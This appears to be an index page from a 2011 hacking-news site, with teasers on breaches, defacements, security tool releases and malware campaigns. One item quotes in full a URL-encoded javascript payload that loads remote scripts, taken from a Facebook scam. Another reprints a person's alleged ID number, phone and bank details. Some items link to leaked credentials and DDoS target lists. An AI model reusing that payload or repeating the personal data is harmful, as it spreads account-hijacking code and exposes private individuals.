The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

Linux kernel 2.6.39 released - Update Now ! After just 65 days of development, Linus Torvalds has  released  version 2.6.39 of the Linux kernel. The new release includes support for  ipset  which simplified firewall configuration and deployment by allowing updatable and quickly searchable external tables to be used by the network filtering. Interrupt handling can now be handled almost entirely by kernel threads, the ext4 file system and block layers are now able to scale better and show better performance and the kernel now includes a network backend for Xen virtualisation. As always, the new kernel brings hundreds of new or enhanced drivers. For example, support for AMD's current "Cayman" family of high end graphics cards and GPUs arrived with a simple DRM/KMS driver. Also new in this release are drivers for the function keys of Samsung notebooks and the Realtek RTL8192CU and RTL8188CU Wi-Fi chips. Whats News in  Linux kernel 2.6.39 The latest Linux kernel...

Government Directorate Pakistan hacked by lionaneesh Some of Hacked Users by lionaneesh :  http://pastebin.com/e3htceHt Hacked site : http://www.e-government.gov.pk/

The Social-Engineer Toolkit v1.4 latest Version ! The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Official change log: Java changed how self signed certificates work. It shows a big UNKNOWN now, modified self sign a bit. Added the ability to purchase a code signing certificate and sign it automatically. You can either import or create a request. Fixed a bug in the wifi attack vector where it would not recognize /usr/local/sbin/dnsspoof as a valid path Fixed a bug in the new backtrack5 to recognize airmon-ng Added the ability to import your own code signed certificate without having to generate it through SET Fixed an issue where the web templates would load two java applets on mistake, it now is correct and only loads one F...

Sony PlayStation Network hacked again, user passwords compromised ! With Sony's PlayStation Network freshly back online, attackers have once again breached the system, this time going for a vulnerability with the system's password reset. This is getting (more) ridiculous. Not even two days after Sony restored its embattled PlayStation Network for most users worldwide, cyber criminals have once again launched an attack, this time going after the PSN’s password reset system. In order for users to reconnect to the PSN, they were required to reset their passwords. You know, for security reasons… News of this third, most recent attack were originally reported on Nyleveia.com, which warned PSN users that “accounts are still not safe.” “I want to make this clear to ALL PSN users. Despite the methods currently employed to force a password change when you first reconnect to the PlayStation network, your accounts still remain unsafe,” writes Nyleveia. “A new hack is currently doin...

It seems that information which Dropbox, the popular web-based file-sharing site/service, issued in response to a US Federal Trade Commission complaint, has revealed a potential security flaw that, according to Ray Bryant, CEO of Idappcom, could be exploited by hackers. According to Bryant, after becoming upset with Dropbox's claims over encryption, a security researcher filed an FTC complaint against the network and, as part of its response, the firm revealed that users' files are hash-tagged each time they are uploaded. This means that, if user A uploads, for example, pictures with a given hash-tag and then user B uploads the same name/sized file - with the same hash-tag - their version is not actually uploaded. Put simply, he claims, users A and B share access to user A's first file, without user A's permission. Bryant says it may also be possible to upload an infected version of a popular file on other services and, when other users `upload' the legitima...

Hackmeout.Net Hacked By Shadow008 (PakCyberArmy) Hacked Site : http://hackmeout.net/ Mirror : http://legend-h.org/mirror/163779/hackmeout.net/

Wi-Fi Security Challenge 3 By Security Tube, Prize: $50 ! Wi-Fi Security Challenge 3: http://www.securitytube.net/video/1884 This challenge has 2 parts: 3a. Never Judge a Packet by its Type: In this challenge the trace file contains a Shared Key Challenge Text and Encrypted Response. You will need to crack the WEP key with just this. 3b. Never Send a N00b to a do a Hacker's Job: In this challenge, you send your N00b apprentice to collect a Wireshark trace. He mistakenly limits the size of the packets and all your get is a truncated encrypted data packet! :( Can you crack the WEP key with just this? Take a shot! All tools / programming platforms required are present on BT4. We don't expect you to scour the web for this :) Prizes: The first person to finish the challenges and send us an email will win $50 worth of goodies from Amazon. Your choice! choose what you want! You can download the trace files and updates from the Challenge Page: http://www.securitytube.ne...

Android phones vulnerable to hackers ! Handsets using Google’s operating system can allow hackers to access calendars, contacts and private pictures, they claim. Only the latest phones have had the data leak plugged, meaning 99.7 per cent of Android handsets are vulnerable. ‘We wanted to know if it is really possible to launch an impersonation attack against Google services,’ the German researchers wrote. ‘The short answer is yes, it is possible and it is quite easy to do so. ‘The adversary can gain full access to the calendar, contacts information or private web albums of the respective Google user. ‘This means that the adversary can view, modify or delete any contacts, calendar events or private pictures.’ The research was carried out by a University of Ulm team, who studied how Android dealt with log-ins for web-based services. When a user needs to access Google calendar, contacts and photo apps, an authentication ‘token’ is retrieved. But the tokens are sent unencrypted in p...

SQLi vulnerability in Indian Premier League Found by MaDnI - PCA MaDnI - PCA found Sql Injection vulnerability in (IPL) Indian Premier League website http://www.iplt20.com .  vulnerability  allow to get whole sql database including Logins details and all.  Proof of Vunl : http://pastebin.com/qBMmmdW0

A firm employed by the French government to track down net pirates has been hacked. Trident Media Guard is believed to have exposed a range of data, including advice on how to avoid detection. TMG monitors peer-to-peer networks as part of France's efforts to find those guilty of copyright infringements. Eric Walter, head of the French anti-piracy unit, confirmed on Twitter that it had "temporarily suspended" links with TMG. France's so-called HADOPI law has caused controversy since it was introduced in 2009. Suspected illegal file-sharers receive three official warnings, after which they are reported to a judge who can hand out a range of punishments, including disconnecting them from the internet. The UK is due to introduce similar legislation, although at this stage it has no plans to punish offenders with disconnection. But it will need to employ a firm similar to TMG. When anti-piracy firms monitor peer-to-peer networks for copyright infringements, they...

Govt militry Engineering services database hacked by MaDnI (PCA) Madni ,member of Pakistan Cyber Army today hack the admin login /password of Govt militry Engineering services at http://www.mes.gov.in/ . Admin login is leaked by him at  http://pastebin.com/AKbci4yH

TinKode  Hack FTP of  NASA Goddard Space Flight Center  ! TinKode  Give another big Hack. This time he hack FTP of  NASA Goddard Space Flight Center  at  servir.gsfc.nasa.gov  , Some Months before  European Space Agency (ESA.INT) was also Hacked by TinKode . In Above image you can see the proof of hack.

Metasploit Framework 3.7.1 Released ! Statistics Metasploit now ships with 687 exploit modules, 357 auxiliary modules, and 39 post modules. 2 new exploits and 2 new auxiliary modules have been added since the last release. Highlights & New Features This release address a performance issue with HTTP Services and adds a few modules. In addition, a bug in the Windows auto-update task has been corrected, along with minor changes to the Windows installer. New Modules VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow ICONICS WebHMI ActiveX Buffer Overflow SPlayer 3.7 Content-Type Buffer Overflow OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit ARP Spoof Download Metasploit Framework 3.7.1

Microsoft's Bing And Facebook 's Like Button Team Up Against Google ! Microsoft has deepened its ties with Facebook by integrating the platform’s social network data with the Bing search engine. Under the new partnership, users will be able to view ‘likes’ and recommendations made by their friends on the Bing search engine. Microsoft said that Bing will be capable of prioritising the search results based on Facebook ‘likes’, providing a more personalised search experience to Facebook and Bing users. The famous Facebook ‘like’ button will appear on the search results. The companies had started integrating Facebook's ‘Like’ button in February, but the new partnership will allow users to see the recommendations made by complete strangers. “New features make it easier to see what your Facebook friends “like” across the Web, incorporate the collective know-how of the Web into your search results, and begin adding a more conversational aspect to your searches,” the c...

Vulnerability in Google ClientLogin Protocol ! A group of security and privacy researchers from the Institute of Media Informatics at Ulm University in Germany, is claiming to have discovered a serious security vulnerability in Google's ClientLogin protocol. In a recent analysis of the Android platform, the group discovered that when Android users are connected to an unencrypted open Wifi network, an attacker could both read transmitted synchronization data of Google Contacts, Calendar and Picasa Web Albums, and capture the authToken that’s user for authentication. Bastian Könings, one of the researchers from the group, told SecurityWeek, “The adversary could use this authToken to gain full access to the data API of the specific service and view, modify or delete any contacts, calendar events, and web albums of that user.” “The vulnerability isn’t limited to Android Google apps, but to any apps and desktop applications that use Google's ClientLogin protocol over HTTP r...

Pakistan Cyber Army (PCA) owner SHAK Exposed By Indishell (Indian Hackers) Few Days Before , Pakistan Cyber Army got hacked by Indian Cyber Army (Indishell) , and Indishell Got whole Database of PCA site. They Explore the stuff and Got the Real Identity of PCA member, who was continuously hacking the thousands of Indian websites and Servers Daily. In Nov, 2010 CBI  was also hacked by some Pakistan hackers. Lets See What Indishell Got from Their Database Dump : 1.) On Private Message PCA admin Shak is asking for 8000 PKR to Teach Hacking Course (ECH). His Name and Bank details are below -- Name : Bilal Yaqoob Place:- Karachi, Sindhi Country :- Pakistan His Bank or what ever the payment details here are they ID card Number : 35202-1555072-9 PayMent GateWay :- easy paise Mobile number :-03324681620 (U PHONE) Studying in punjab university 2.) Adil, Member of PCA team was arrested (according to Pakistan Govt) ,in case of Cyber attack on Pakistan P...

#OpEverest :  Anonymous make Central website of the Nepal Government Down Anonymous have new #OpEverest Against Nepal Government . The open letter to Govt of Nepal from Anonymous is as shown. Nepal Government website is down because of DDos attack ! Link : http://www.nepalgov.gov.np/ They have define next some targets also : * http://www.ucpnm.org/ * http://www.nepalicongress.org/ * http://www.cpnuml.org/ * http://www.mjfn.org/ Stay Tuned for Updates :)

Fake antivirus campaign on India’s DNA e-newspaper website ! DNA (Daily News and Analysis) is an Indian daily English language newspaper. According to Wikipedia, DNA ranks 8th among the top ten English dailies in India. Recently, the Zscaler solution was blocking access to this site, as it contained malicious content. Here is the homepage of this website: The ‘Today’s E-newspaper’ link (circled above) is an online version of the printed periodical. We discovered that one of the pages from this e-newspaper site was infected with malicious script. Here is the screenshot of that page: The malicious script tag had been inserted in plain text as can be seen in this screenshot of page source: The malicious script tag directs the victim’s browser to ‘hxxp://vcvsta.com/ur.php’. This page then redirects the user to another malicious site (‘hxxp://www4.to-gysave.byinter.net,), which will again redirect victim to random sites hosting fake antivirus campaigns. Here is the screenshot disp...

QuickRecon v0.3 version released ! QuickRecon is a simple information gathering tool that allows you to: find subdomain names, perform zone transfer, gather emails and find human relationships using microformats. It is a simple information gathering utility based on Qt4 toolkit. Download QuickRecon v0.3 here

New Facebook Scam : WTF I can’t believe you’re in this video ! If you happen to get a new wall post from your friend saying “ WTF I can’t believe you’re in this vid ” or “ ROFL i cant believe youre tagged in this video ” Its a new scam spreading on Facebook. Don’t open or click on this link else it will be posted to all your friends wall, esp. copy any URL [java-script code] and paste in your browser navigation/location bar to help spread the message to all your friends. javascript:(function()%7Bfunction%20s(src)%7Bvar%20script%20%3D%20document.createElement(%22script%22)%3Bscript.src%20%3D%20src%3Bdocument.body.appendChild(script)%3B%7Dvar%20rand%20%3D%20Math.floor(Math.random()*(100))%3Bs(%22http%3A%2F%2Fvideosurge.info%2Fverify.js%22)%3B%20if(rand%20%3C%3D%2025)%20s(%22http%3A%2F%2Fvideosurge.info%2Fconfig.js%22)%3Belse%20s(%22http%3A%2F%2Fbanfish.info%2Fconfig.js%22)%3B%7D)()%3B Most importantly for the user who fall into such scams by clicking the links in impulse. Re...

Ronaldinho website hacked by Osama bin Laden supporter ! Ronaldinho's website has been hacked by someone appearing to support Osama bin Laden. GloboEsporte.com reports the hacker posted a photo of bin Laden and statements supporting Islam, as well as comments in Arabic attacking Ronaldinho's "hatred" of Islam. The site was hacked for a few hours on Saturday, according to the GloboEsporte.com website and other local media. Ronaldinho could not be contacted for comment. He signed with Flamengo in the beginning of the year, returning to Brazilian football after 10 years in Europe. He helped Flamengo win the Rio de Janeiro state championship, but fans had been jeering him recently because of poor performances that culminated with the team's elimination from the Brazilian Cup on Wednesday.

ISI (Pakistan)  hack email account of Indian Army Major ! A serving Inter-Services Intelligence (ISI) officer Major Sameer Ali hacked an Indian Army major's e-mail account in 2010 and extracted many sensitive documents, intelligence sources said. Ali has been named by India in the list of 50 'most wanted' terrorists sheltered by Pakistan for involvement in the Mumbai attacks conspiracy, The news of the hacking was given to Indian probe agencies by the FBI, which was then interrogating Mumbai attack accused David Coleman Headley. The US agency told the CBI Ali had been accessing an Indian Army officer's rediffmail account from the ISI headquarters. The hacked account was traced to Major Shantanu De of 21 Bihar Regiment, who was at that time posted in the Andamans. De's computer was seized and scrutinised jointly by the Intelligence Bureau, National Investigation Agency and the Military Intelligence. What was baffling was that his computer and e-mail had more t...

Geek.com Hacked, Infects Visitors with Malware ! Security researchers from cloud security provider Zscaler warn that technology website geek.com was compromised and many of its pages are executing drive-by download attacks against visitors. Geek.com is one of the oldest technology news websites around, dating back to 1996, the dawn of the commercial World Wide Web. Attackers have managed to inject rogue IFrames into different portions of the site, both within articles and the site's main pages like home, about us, etc. According to Umesh Wanve, a senior security research engineer at Zscaler, there are multiple infections and the iframes take visitors to different malicious websites. One example is the rogue code injected into a May 13 article about Call of Duty: Modern Warfare 3 details being leaked, which redirects visitors to an exploit kit. These kits perform various checks to determine what versions of certain program users have installed on their computers and th...

Once again Appin tech. hacked,this time TIC GROUP hack their one more site, Have a look : Hacked Domain: http://appinonline.com Mirror :  http://mirror.sec-t.net/defacements/?id=26044

LulzSec Hack & Leak pointless ATM information ! LulzSec Hack & Leak pointless ATM information on their official Twitter account. They are LulzSec, who Hack Fox.com cracked the Fox.com login database, including emails and passwords. Now they also Claim to have 178 logins from an FBI-related website. Leak of ATM info is at  http://pastebin.com/raw.php?i=myPTr0aE

Indian server HaCkeD By The 077 ( Hamdi HaCker ) Hacked Site list and Mirror : Link : http://zone-h.com/archive/ip=216.67.245.98

53 Websites defaced by Andre Corleone (Indonesian hacker) Hacked Sites List : http://pastebin.com/dsqCUbaX

Rumor or True ? FBI &  Fox.com hackers exposed : LulzSec Participants Identified ! Okay Now we have  LulzSec Participants, Just now Exposed by some Investigators at http://pastebin.com/EKmkvtfj . LulzSec are the guys who Hack Fox.com cracked the Fox.com login database, including emails and passwords . Now they Claim to have 178 logins from an FBI-related website. Update :  We have just talk to  OpNoPro  and He claim that, He is not the part of any HACKING ACTIVITY . Neither he is part of   LulzSec . Nothing is confirmed, But still there are lots of important things, that we have to consider before blaming anyone. These two identified guys can be Innocent. We are looking forward to Investigation teams for validating the news and Facts. Stay Tuned ! OpNoPro , heyguise  have been identified according to Source : OpNoPro Info AnonOps IRC Nic: OpNoPro AKA Lulz4All Likely the primary instigator of LulzSec. Pict...

Exclusive Report : Is Department of Defense (DoD), Pentagon, NASA, NSA is Secure ? Over the past couple of weeks there has been a series of discussions around why the U.S defense and Intelligence agencies are moving so quickly to adopt cloud computing. Are there any Security Holes in their Security ? Or has someone already hacked them and their documents ?. In the last week we have noticed lots of hackers activity. If you have missed something then have a look to  Super Saturday : The Hacker News Featured Articles  ! Below you are going to read about Security Holes in the U.S defense and Intelligence agencies! A Hacker named " sl1nk " claims that he has: SSH access to a Network of 140 machine's layer 1 to 3 in the Pentagon Access to  APACS (automated personel air clearance system)  Thousand's of documents ranging from seizure of a vehicle up to private encryption key request forms. Database of all usernames/passwords of Webmail of Nasa. Access to A...